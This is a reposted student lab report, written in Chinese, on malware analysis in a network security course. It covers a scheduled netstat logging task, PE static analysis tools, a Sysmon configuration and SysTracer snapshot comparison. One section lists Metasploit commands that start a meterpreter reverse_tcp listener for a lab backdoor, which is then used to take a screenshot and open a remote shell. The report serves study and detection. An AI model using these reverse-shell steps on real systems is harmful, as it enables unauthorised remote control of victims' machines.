20145120黄玄曦《网络对抗》恶意代码分析

最新推荐文章于 2024-05-20 20:18:16 发布
最新推荐文章于 2024-05-20 20:18:16 发布
阅读量71 收藏
点赞数
文章标签: 操作系统 运维 shell
原文链接:http://www.cnblogs.com/20145120hxx/p/6663936.html
版权

20145120黄玄曦《网络对抗》恶意代码分析

Windows计划任务schtasks

在命令提示符输入schtasks /create /TN netstat /sc MINUTE /MO 5 /TR "cmd /c netstat -bn > c:\netstatlog.txt"新建计划任务

新建netstatlog.bat文件,内容如下:

date /t >> c:\netstatlog.txt
time /t >> c:\netstatlog.txt
netstat -bn >> c:\netstatlog.txt

期间我不小心在命令行输入了这三条命令还产生了效果。。。

查看计划任务,点两下创建时间,筛选一下就可以轻易找到之前新建的任务,编辑一下,把操作改成c:\netstatlog.bat
885218-20170404205208222-910142512.png

放着不管,一天之后。。。。。。没变化。
885218-20170404205125566-602567415.png

额,我之前忘了用管理员权限的命令提示符了,哎浪费时间了,在计划任务里勾上“使用最高权限运行”的选项
885218-20170404212625722-1639304020.png

一段时间后成功看到了变化
885218-20170404205257394-2080523404.png

用多种工具进行静态分析

因为自己其实也没怎么学会如何用好以下软件,我就简单提一下

使用PEid打开文件,可以看到文件的入口点,编译软件等
885218-20170404205330363-745905785.png

使用PEexplorer,可以看到文件的编译时间等基本信息,文件节信息,导入导出表等等
885218-20170404205349425-1357230535.png

此外还有PEview、PEBrowse Professional、Resource Hacker、Dependency Walker等软件都可以用于分析PE文件,各有所长,我也不太会用,不细讲了
885218-20170404205509253-1431584701.png

还可以用http://www.virscan.org/等网站分析,参考免杀原理与实践

用sysmon工具监控系统

安装工具

新建内容如下的配置文件Sysmoncfg.txt

<Sysmon schemaversion="3.10">
  <!-- Capture all hashes -->
  <HashAlgorithms>*</HashAlgorithms>
  <EventFiltering>
    <!-- Log all drivers except if the signature -->
    <!-- contains Microsoft or Windows -->
    <DriverLoad onmatch="exclude">
      <Signature condition="contains">microsoft</Signature>
      <Signature condition="contains">windows</Signature>
    </DriverLoad>

    <NetworkConnect onmatch="exclude">
      <Image condition="end with">chrome.exe</Image>
      <Image condition="end with">iexplorer.exe</Image>
      <SourcePort condition="is">137</SourcePort>
      <SourceIp condition="is">127.0.0.1</SourceIp>
    </NetworkConnect>

    <CreateRemoteThread onmatch="include">
      <TargetImage condition="end with">explorer.exe</TargetImage>
      <TargetImage condition="end with">svchost.exe</TargetImage>
      <TargetImage condition="end with">winlogon.exe</TargetImage>
      <SourceImage condition="end with">powershell.exe</SourceImage>
    </CreateRemoteThread>
  </EventFiltering>
</Sysmon>

想了一下,把拓展名改成xml的同时改个有特色的文件名20145120cfg

用管理员权限打开命令提示符,进入对应文件夹,输入sysmon.exe -i 20145120cfg.xml
885218-20170404210949378-1362779113.png

打开任务管理器,看到Sysmon服务已经开始了。
885218-20170404211007113-1274554569.png

哇,短短时间就200+的日志了。。。额筛选一下联网的事件试试
885218-20170404212605613-1877274538.png
额,看到一个熟悉的名字,Svchost.exe进程,用于微软系统自身联网升级更新啥的,有次室友正在进行紧张激烈的电子竞技,突然很卡,然后发现我正在高速下载,我(?_?),没啊,这锅我不背,我冒着生命危险,赶紧看了一下任务管理器,没错,找到的就是它——Svchost.exe

开始分析恶意代码

用的就是免杀原理与实践中的恶意代码

先启动kali虚拟机,依次输入以下命令进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.253.129
set LPORT 5120
exploit

之后使用shell命令获取命令提示符试试。

这时候可以打开事件查看器查看事件了。
用关键字"bd.exe",查找一下,有进程创建事件,联网事件等
创建进程
885218-20170404211211082-475016276.png
联网,看到了我kali机的IP
885218-20170404211224957-1320776091.png
命令行的进程
885218-20170404211241769-1095534457.png

用SysTracer动态分析恶意代码

用的还是之前的恶意代码,回连kali机攻击过程如下
885218-20170404212722019-808478485.png

在win10靶机安装好SysTracer工具,选择要记录的项目,拍下第一张快照Snapshot #1
885218-20170404212915457-1881038572.png
启动后门程序bd.exe,确定已回连kali攻击机后拍下第二张快照Snapshot #2
在kali机进行攻击,本来想试试给自己拍个照webcam_snap,但失败了,来张截屏吧screenshot,之后拍下快照Snapshot #3
shell获取windows命令提示符,之后拍下快照Snapshot #4

比较各快照的不同,选择显示不同的项"only differences",可能是因为我开的程序比较多,数据很多啊,看的我头都大了,不是很懂啊
选择1,2两个快照比较,可以看到多个注册表项、文件、进程修改过了,不过看到了bd.exe进程开始了
885218-20170404213245332-1533338257.png

885218-20170404212832441-476747461.png

885218-20170404213354566-1780207930.png

比较2,3两个快照,我找了很久找到一个操作过Microsoft Video for Windows的dll文件的痕迹,操作真不少,感觉不是我有目的性的找关于屏幕截图、文件操作的话很难分析啊
885218-20170404213444019-1165725098.png

比较3,4两个快照比较,这次比较顺利,很快找到了cmd.exe运行的痕迹
885218-20170404213455191-986243052.png

唉,恶意代码分析真是个累人的工作

实验后回答问题

1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。

用sysmon工具或其他类似工具(windows自带的计划任务等),考虑好适当的过滤规则编写好适当的配置文件,然后导出日志进行分析。

2.如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息。

用SysTracer工具或其他类似工具,在虚拟机中运行该程序,并进行快照,比较快照进行分析。

实验体会

这次实践中我们自己加壳的后门程序,运行了这么久我360毫无反应,要不是学过了,估计以后只能亡羊补牢。就算学过了监控自己的系统,感觉要是系统里有后门也很难发现,毕竟数据量大。借用一句话,社会是真的险恶啊。

转载于:https://www.cnblogs.com/20145120hxx/p/6663936.html

weixin_30300225
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20145120黄玄网络对抗》Web安全基础实践
weixin_30732825的博客
05-17 93
20145120黄玄网络对抗》Web安全基础实践 回答问题 (1)SQL注入攻击原理,如何防御 SQL注入原理简单地说大概是,通过构造特殊的SQL命令提交表单,让服务器执行构造的恶意SQL命令,以对数据库进行恶意操作。 服务器前端可以通过限制用户输入的长度,检测用户输入的内容(例如#,--,1=1等敏感的代码)等方法防止SQL注入,后台程序也可以再检测一遍前端传过来的内容,数据库中存放的一些数...
20145120黄玄网络攻防》网络欺诈技术防范
weixin_30725315的博客
05-01 86
20145120黄玄网络攻防》网络欺诈技术防范 回答问题 (1)通常在什么场景下容易受到DNS spoof攻击 不同局域网要实现DNS攻击难度很大,通常在同一局域网内容易受到攻击,例如商店、饭店公开的wifi之类的 (2)在日常生活工作中如何防范以上两攻击方法 不要连公开wifi,不要打开可疑链接,用安全浏览器(例如360,可以看到网页信息,真的网站360会显示安全) 真网站 假网站 实验...
20145120黄玄网络对抗》Web基础
weixin_30251587的博客
05-08 72
20145120黄玄网络对抗》Web基础 回答问题 (1)什么是表单 表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 表单按钮:包括提交按钮、复位按钮和一般按钮;用于将数据传送到服务器上的CGI脚本或...
20145120黄玄网络对抗》MSF基础应用
weixin_30352645的博客
04-16 58
20145120黄玄网络对抗》MSF基础应用 准备工作 本来决定就是老师提供的XP虚拟机了,做着做着发现因为打补丁以及语言的问题,需要另外的虚拟机。 求来了不那么健壮的虚拟机,环境如下: 实践部分 (1)主动攻击:MS08_067 从实验指导exploit/windows/smb/ms08_067_netapi易知,MS08_067这个漏洞是属于Windows平台对SMB协议的攻击 进入/...
20145120黄玄网络对抗》免杀原理与实践
weixin_30539625的博客
03-27 65
20145120黄玄网络对抗》免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测 杀软公司通过分析恶意代码,找到恶意代码都有,而正常代码少有的特征代码,用这些已知的特征码与代码匹配检测,出错率低。 启发式恶意软件检测、基于行为的恶意软件检测 指导教材上说的很明白了,“对恶意软件检测来说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,那我们就把它当...
20145120黄玄网络对抗》信息搜集与漏洞扫描
weixin_30569153的博客
04-22 76
20145120黄玄网络对抗》信息搜集与漏洞扫描 问题回答 (1)哪些组织负责DNS,IP的管理:(百度一下这问题出来了好多同学的博客。。。笑哭) 全球根服务器均由美国政府授权的ICANN统一管理,负责全球的域名根服务器、DNS和IP地址管理。 全球根域名服务器:绝大多数在欧洲和北美(全球13台,用A~M编号),中国仅拥有镜像服务器(备份)。 全球一共有5个地区性注册机构:ARIN主要负责北...
20145120黄玄《计算机病毒》高级静态分析
weixin_30357231的博客
05-22 70
20145120黄玄《计算机病毒》高级静态分析 1 PSLIST导出函数做了什么? 从EXPORT窗口双击查看PSLIST函数 发现其调用如下图函数,上面一个判断当前的平台(与WIN32比较),操作系统版本(与VISTA比较) 调用API(CreateToolhelp32Snapshot)获取进程列表,配合其他API达到发送进程列表到远端或寻找某个特定进程的目的 2 使用图模式绘制出s...
使用grafana beyla作为ebpf无侵入式trace收集工具
神棍之路
05-17 860
Beyla 使用 eBPF 自动检查应用程序可执行文件和操作系统网络层,并捕获与 Web 事务相关的跟踪跨度和 Linux HTTP/S 和 gRPC 服务的 Rate Errors Duration (RED) 指标,而无需对应用程序代码或配置进行任何修改。它使用 eBPF 自动检查应用程序可执行文件和操作系统网络层,并捕获与 Web 事务相关的跟踪跨度和 Linux HTTP/S 和 gRPC 服务的 Rate Errors Duration (RED) 指标,而无需对应用程序代码或配置进行任何修改.
鸿蒙内核源码分析 (内核启动篇) | 从汇编到 main ()
maniuT的博客
05-14 837
这应该是系列篇最难写的一篇,全是汇编代码,需大量的底层知识,涉及协处理器,内核镜像重定位,创建内核映射表,初始化模式栈,热启动,到最后熟悉的。
尝试使用官方jailhouse-images仓库运行jailhouse
ScilogyHunter的博客
05-15 1010
通过jailhouse 的官方 demo 演示仓库,可以直接编译出带有部署有jailhouse程序的Linux镜像,有多个目标平台的Linux镜像可选,也有在qemu下的镜像。参考文档:https://bbs.csdn.net/topics/615164494。
嵌入式Linux:编译和使用Protobuf库
不脱发的程序猿
05-14 912
Protobuf提供了Protobuf工具,用于将.proto文件转换为C源代码和头文件,而Protobuf-c生成了编译所需的动态库。
操作系统 实验13 批处理操作接口3:引用与命令替换
m0_63093530的博客
05-14 155
结果:第一个和第三个命令是错的,第二个和第四个命令是对的。echo "这是命令替换形式1...$date1"echo "$sv ++++加上另一些字符!2、输出字符串“China's panda”命令:echo China\'s panda。6、将命令date执行结果赋予变量date1。7、将命令date执行结果赋予变量date2。1、输出字符串“$Dollar”命令:echo \$Dollar。命令:date2=$(date)命令:date1=`date`
linux中查找某个文件或文件夹
DN金猿的博客
05-18 245
locate命令将会在整个系统中搜索文件和文件夹,并通过正则表达式匹配以"/folder_name"结尾的路径。这将会在指定的路径(/path/to/search)中递归地列出所有文件和文件夹,并使用grep命令匹配以"/folder_name"结尾的行。该命令将会在指定的路径(/path/to/search)中查找名称为"folder_name"的文件夹。此方法与第2种方法类似,但使用了find命令来递归搜索文件夹,并使用grep命令来匹配以"/folder_name"结尾的行。
Linux:网络管理命令之ss
hhd1988的专栏
05-17 813
Linux:网络管理命令之ss
Linux的基础指令
asdssadddd的博客
05-14 946
常用选项:-f 或 --force 强行复制文件或目录, 不论目的文件或目录是否已经存在.-i 或 --interactive覆盖文件之前先询问用户.-r递归处理, 将指定目录下的文件与子目录一并处理. 若源文件或目录的形态, 不属于目录或符号链接, 则一律视为普通文件处理.-R 递归处理, 将指定目录下的文件及子目录一并处理.
Linux mkdir命令参数和选项
2301_78660211的博客
05-16 773
mkdir命令是Linux操作系统中一个非常重要的命令,它可以帮助我们创建新的目录。在这篇博客中,我们介绍了mkdir命令的基本用法、参数、选项,以及mkdir命令的实际应用。希望这篇博客能帮助读者更好地理解和使用mkdir命令。
国产化信息技术基础设施构建方案
雨笋情缘的专栏
05-20 205
随着信息技术国产化的趋势日益增强,为保障信息安全与自主可控,本方案旨在通过全面调研与科学评估,实现操作系统及基础软件的国产替代。本方案将聚焦于国产操作系统的调研与选择,以及数据库、中间件等基础软件的国产化替代方案,确保技术体系的高效稳定运行与持续发展。本方案旨在通过系统性的调研与评估,实现信息技术基础设施的国产化升级,提升系统的安全性与自主可控能力。未来,随着国产软硬件生态的不断成熟,将进一步优化技术栈,促进技术创新与产业升级,为企业的可持续发展奠定坚实的基础。兼容性:对常用应用软件、硬件设备的支持情况。
7-zip简介
地球空间
05-14 309
1. **压缩与解压缩**:7-Zip支持多种文件格式的压缩与解压缩,包括但不限于7z、ZIP、GZIP、BZIP2和TAR格式。3. **安全性**:7-Zip支持对7Z及ZIP文件格式进行AES 256位元加密,增强了文件的安全性。2. **高压缩率**:7-Zip提供的压缩率比PKZip和WinZip提供的压缩率高2-10%。12. **免费开源**:7-Zip对个人和企业用户完全免费,且开源,允许用户查看和修改源代码。11. **多语言支持**:7-Zip支持几十种语言,包括中文。
Winserver2012R2系统之后的密码明文抓取方式
最新发布
求大佬师傅带
05-20 379
在Windows2012以及win10之前,登录过程是不一样的,首先winlogon进程会把用户输入的用户名和密码传给lsass.exe进程,此进程首先会在内存中存储一份用户名密码的明文,然后将明文做NTLMhash的加密生成密文,再和SAM文件内的hash值进行比对,相同则登录成功,反之登录失败。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值